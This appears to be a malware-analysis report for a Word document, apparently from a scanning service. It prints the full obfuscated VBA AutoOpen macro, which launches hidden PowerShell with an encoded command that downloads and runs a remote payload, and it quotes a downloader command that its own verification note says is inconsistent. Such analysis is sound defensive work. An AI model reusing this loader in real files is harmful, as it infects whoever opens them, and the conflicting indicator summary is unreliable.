MALICIOUS
110
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains a VBA macro with an AutoOpen function that is designed to execute a command. This command decodes a Base64 string which, when executed, downloads and runs a PowerShell script from a remote URL. The script itself is obfuscated, but the decoded command appears to be 'powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://185.189.255.133/a.txt')"', indicating a downloader for a second-stage payload. Verification note: the quoted command is not what the extracted macro below assembles. Reading the DQ_MB character-array indices in order yields `powershell -windowstyle hidden -executionpolicy bypass -e ` followed by the concatenated Base64 fragments (an -EncodedCommand, i.e. UTF-16LE, payload), and that payload appears to decode to an `invoke-webrequest` against an Azure Table Storage (`table.core.windows.net`) SAS URL whose JSON response is Base64-decoded and passed to `iex` — not a plain-HTTP fetch from the IP quoted above. The URL/IP in this summary should be checked against the decoded macro before it is used as an indicator.
Heuristics 5
-
VBA macros detected — medium — 2 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
Potential Shell call in VBA — critical — OLE_VBA_SHELL: Potential Shell call in VBA. Matched line in script:
GM_SA = GM_SA + AM_OJ Shell$ GM_SA End Sub -
AutoOpen macro — low — OLE_VBA_AUTOOPEN: AutoOpen macro. Matched line in script:
Attribute VB_Name = "genial" Sub AutoOpen() Dim GM_SA As String -
Legacy WordBasic auto-exec macro marker — medium — OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: ff0f1ce6e6f3ed34ee96e0c53bfdff71b78be3cf6bf2b824dd8c44ab02f897f1) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5899 bytes |
Preview script — first 1,000 lines of the extracted script
' Module attribute headers as written in the VBA project stream. Two
' VB_Name headers appear because the extractor concatenates every module
' into one file: the document class module "ThisDocument" (no code of its
' own is shown here) followed by a standard module named "genial", which
' is the module that holds the AutoOpen procedure below.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "genial"
' AutoOpen is invoked by Word when the document is opened (the
' OLE_VBA_AUTOOPEN finding). It builds one command line in GM_SA and
' hands it to Shell$ (the OLE_VBA_SHELL finding).
'
' Two independent strings are assembled in an interleaved order that is
' pure obfuscation:
'   * GM_SA is grown one character at a time by indexing the DQ_MB
'     character array; read in sequence the indices spell
'     "powershell -windowstyle hidden -executionpolicy bypass -e ".
'   * AM_OJ is grown by concatenating Base64 fragments; it becomes the
'     argument of -e (-EncodedCommand), which PowerShell decodes as
'     UTF-16LE text.
' Only GM_SA is declared; DQ_MB and AM_OJ are never declared (implicit
' Variants). `+` is used for the character path and `&` for the Base64
' path.
'
' NOTE(review): the concatenated AM_OJ appears to decode to a small
' helper that Base64-decodes a string, followed by `iex` over the result
' of an `invoke-webrequest` to an Azure Table Storage
' (`table.core.windows.net`) SAS URL with an Accept: Application/JSON
' header, taking `.value.data` from the JSON. Confirm against the full
' decoded blob before publishing indicators; the "Malware Insights"
' summary on this report quotes a different command.
'
' Detection angle: Word spawning powershell.exe with "-windowstyle
' hidden", "-executionpolicy bypass" and "-e <long Base64>" on the
' command line.
Sub AutoOpen()
Dim GM_SA As String
' Character lookup table: 0=i 1=b 2=l 3=p 4=d 5=- 6=x 7=a 8=e 9=n 10=u
' 11=w 12=o 13=y 14=s 15=r 16=space 17=t 18=h 19=c
DQ_MB = Array("i", "b", "l", "p", "d", "-", "x", "a", "e", "n", "u", "w", "o", "y", "s", "r", " ", "t", "h", "c")
Dim HR_LA As String
HR_LA = "ZgB1AG4AYwB0AGkAbwBuACAA"
' DQ_MB(3)(12)(11)(8)(15)(14)(18)(8)(2)(2) -> "powershell"
GM_SA = GM_SA + DQ_MB(3)
GM_SA = GM_SA + DQ_MB(12)
Dim CL_SE As String
CL_SE = "YQAoACQAeAApAHsA"
GM_SA = GM_SA + DQ_MB(11)
GM_SA = GM_SA + DQ_MB(8)
Dim BM_PD As String
BM_PD = "cgBlAHQAdQByAG4AIABbAF"
GM_SA = GM_SA + DQ_MB(15)
GM_SA = GM_SA + DQ_MB(14)
Dim GR_OH As String
GR_OH = "MAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4"
GM_SA = GM_SA + DQ_MB(18)
GM_SA = GM_SA + DQ_MB(8)
Dim BP_KE As String
BP_KE = "AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0"
' First Base64 batch appended to AM_OJ (AM_OJ starts as an empty Variant).
AM_OJ = AM_OJ & HR_LA & CL_SE & BM_PD & GR_OH & BP_KE
GM_SA = GM_SA + DQ_MB(2)
GM_SA = GM_SA + DQ_MB(2)
Dim HO_RB As String
HO_RB = "AHIAaQB"
' (16)(5)(11)(0)(9)(4)(12)(11)(14)(17)(13)(2)(8) -> " -windowstyle"
GM_SA = GM_SA + DQ_MB(16)
GM_SA = GM_SA + DQ_MB(5)
Dim JS_TE As String
JS_TE = "uAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBl"
GM_SA = GM_SA + DQ_MB(11)
GM_SA = GM_SA + DQ_MB(0)
Dim ER_ND As String
ER_ND = "AHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA"
GM_SA = GM_SA + DQ_MB(9)
GM_SA = GM_SA + DQ_MB(4)
Dim GM_NF As String
GM_NF = "0AFMAdAByAGkAbgBnACgAJAB4ACkAKQB9ADsAaQBlAHg"
GM_SA = GM_SA + DQ_MB(12)
GM_SA = GM_SA + DQ_MB(11)
Dim DM_RA As String
DM_RA = "AIAAkACgAYQAgACQA"
AM_OJ = AM_OJ & HO_RB & JS_TE & ER_ND & GM_NF & DM_RA
GM_SA = GM_SA + DQ_MB(14)
GM_SA = GM_SA + DQ_MB(17)
Dim JO_PD As String
JO_PD = "KAAkACgAJAAoAGkAbgB2AG8AawBlAC0A"
GM_SA = GM_SA + DQ_MB(13)
GM_SA = GM_SA + DQ_MB(2)
Dim GO_NJ As String
GO_NJ = "dwBlAGIAcgBlAHEAdQBlAHMAd"
GM_SA = GM_SA + DQ_MB(8)
' (16)(18)(0)(4)(4)(8)(9) -> " hidden"
GM_SA = GM_SA + DQ_MB(16)
Dim JL_RA As String
JL_RA = "AAgACcAaAB0AHQAcABzADoALwAvAHUAcwBwAHIAZAA1"
GM_SA = GM_SA + DQ_MB(18)
GM_SA = GM_SA + DQ_MB(0)
Dim FO_RF As String
FO_RF = "ADEANQAwAGMAZQBuAHQAcgBhAGwALgB0AGEAYgBsAGUALgBjAG"
GM_SA = GM_SA + DQ_MB(4)
GM_SA = GM_SA + DQ_MB(4)
Dim DK_OE As String
DK_OE = "8AcgBlAC4AdwBpAG4AZABvAHcAcwAuAG4AZQB0AC8AdwBhA"
AM_OJ = AM_OJ & JO_PD & GO_NJ & JL_RA & FO_RF & DK_OE
GM_SA = GM_SA + DQ_MB(8)
GM_SA = GM_SA + DQ_MB(9)
Dim HL_RI As String
HL_RI = "HIAZQBoAG8AdQBzAGUAPwAkA"
' (16)(5)(8)(6)(8)(19)(10)(17)(0)(12)(9)(3)(12)(2)(0)(19)(13) -> " -executionpolicy"
GM_SA = GM_SA + DQ_MB(16)
GM_SA = GM_SA + DQ_MB(5)
Dim IL_LJ As String
IL_LJ = "GYAaQBsAHQAZQ"
GM_SA = GM_SA + DQ_MB(8)
GM_SA = GM_SA + DQ_MB(6)
Dim HQ_LA As String
HQ_LA = "ByAD0AUABhAHIAdABpAHQAaQBvAG4ASwBlAHk"
GM_SA = GM_SA + DQ_MB(8)
GM_SA = GM_SA + DQ_MB(19)
Dim GL_KD As String
GL_KD = "AJQAyADAAZQBx"
GM_SA = GM_SA + DQ_MB(10)
GM_SA = GM_SA + DQ_MB(17)
Dim JR_QG As String
JR_QG = "ACUAMgAwACUAMgA3AHMAdABhAGcAZQAlADIANwAmACQA"
AM_OJ = AM_OJ & HL_RI & IL_LJ & HQ_LA & GL_KD & JR_QG
GM_SA = GM_SA + DQ_MB(0)
GM_SA = GM_SA + DQ_MB(12)
Dim JP_SB As String
JP_SB = "UwBlAGwAZQBjAHQAPQBkAGE"
GM_SA = GM_SA + DQ_MB(9)
GM_SA = GM_SA + DQ_MB(3)
Dim AR_PI As String
AR_PI = "AdABhACYAcwB2AD0AMgAwADEANwA"
GM_SA = GM_SA + DQ_MB(12)
GM_SA = GM_SA + DQ_MB(2)
Dim BQ_RD As String
BQ_RD = "tADAANAAtADEANwAmAHMAcwA9AG"
GM_SA = GM_SA + DQ_MB(0)
GM_SA = GM_SA + DQ_MB(19)
Dim FQ_RG As String
FQ_RG = "IAZgBxAH"
GM_SA = GM_SA + DQ_MB(13)
' (16)(1)(13)(3)(7)(14)(14) -> " bypass"
GM_SA = GM_SA + DQ_MB(16)
Dim AP_KG As String
AP_KG = "QAJgBzAHIAdAA9AHMAYwBvACYAcwBwAD0AcgB3AGQAbABh"
AM_OJ = AM_OJ & JP_SB & AR_PI & BQ_RD & FQ_RG & AP_KG
GM_SA = GM_SA + DQ_MB(1)
GM_SA = GM_SA + DQ_MB(13)
Dim BO_MF As String
BO_MF = "AGMAdQBwACYAcwBlAD0AMgAwAD"
GM_SA = GM_SA + DQ_MB(3)
GM_SA = GM_SA + DQ_MB(7)
Dim EL_RH As String
EL_RH = "EANwAtADEAMA"
GM_SA = GM_SA + DQ_MB(14)
GM_SA = GM_SA + DQ_MB(14)
Dim IP_RE As String
IP_RE = "AtADAANgBUADIAMgA6ADQAMQA6ADEAMgBaACYAcwB0AD0A"
' (16)(5)(8)(16) -> " -e " : the -EncodedCommand switch, AM_OJ follows it
GM_SA = GM_SA + DQ_MB(16)
GM_SA = GM_SA + DQ_MB(5)
Dim BT_PG As String
BT_PG = "MgAwADEANwAtADAAOQAtADIAOABUADEANAA6ADQAMQA"
GM_SA = GM_SA + DQ_MB(8)
GM_SA = GM_SA + DQ_MB(16)
Dim IQ_MF As String
IQ_MF = "6ADEAMgBaACYAcwBwAHIAPQBoAHQAdABwAHMAJ"
AM_OJ = AM_OJ & BO_MF & EL_RH & IP_RE & BT_PG & IQ_MF
' From here on only Base64 fragments are appended; GM_SA is complete
' apart from the final AM_OJ concatenation.
Dim JP_NF As String
JP_NF = "gBzAGkAZwA9AHQA"
Dim DP_QF As String
DP_QF = "egBQADcAYwA4AHgAWgBoA"
Dim BM_PC As String
BM_PC = "HIAMQBzAGIAdgB4ADkAZgBKAFMAdwB"
Dim EQ_QG As String
EQ_QG = "KAEkAUwBIAEIANgBlADgAJQAyAEIAbgBsAGwAdQBuAEgAa"
Dim BQ_RI As String
BQ_RI = "QBmAEwAMwBoAHgAagA0ACUAMwBEACcAIAAtAEg"
AM_OJ = AM_OJ & JP_NF & DP_QF & BM_PC & EQ_QG & BQ_RI
Dim IN_NE As String
IN_NE = "AZQBhAGQAZQByAHMAIABAAHs"
Dim AP_RB As String
AP_RB = "AJwBBAGMAYwBlAHAAdAAnAD0AJwBBAHAAcAB"
Dim HT_MC As String
HT_MC = "sAGkAYwBhAHQAaQBvAG4ALwBKAFM"
Dim HS_PJ As String
HS_PJ = "ATwBOACcAfQApAC4AQwBvAG4AdA"
Dim AN_LG As String
AN_LG = "BlAG4AdAAgAHwAIABDAG8AbgB2AGUAcgB0AE"
AM_OJ = AM_OJ & IN_NE & AP_RB & HT_MC & HS_PJ & AN_LG
Dim FO_KI As String
FO_KI = "YAcgBvAG0ALQBKA"
AM_OJ = AM_OJ & FO_KI
Dim EQ_LH As String
EQ_LH = "HMAbwBuACkALgB2AGEAbAB1AGUALgBkAGEAdABhACkAKQ"
AM_OJ = AM_OJ & EQ_LH
Dim IQ_MD As String
' "A=" carries the Base64 padding that closes the blob.
IQ_MD = "A="
AM_OJ = AM_OJ & IQ_MD
' Final command line:
'   powershell -windowstyle hidden -executionpolicy bypass -e <AM_OJ>
GM_SA = GM_SA + AM_OJ
' Execution sink: a hidden PowerShell child of winword.exe with an
' encoded command — the process-tree/command-line event to alert on.
Shell$ GM_SA
End Sub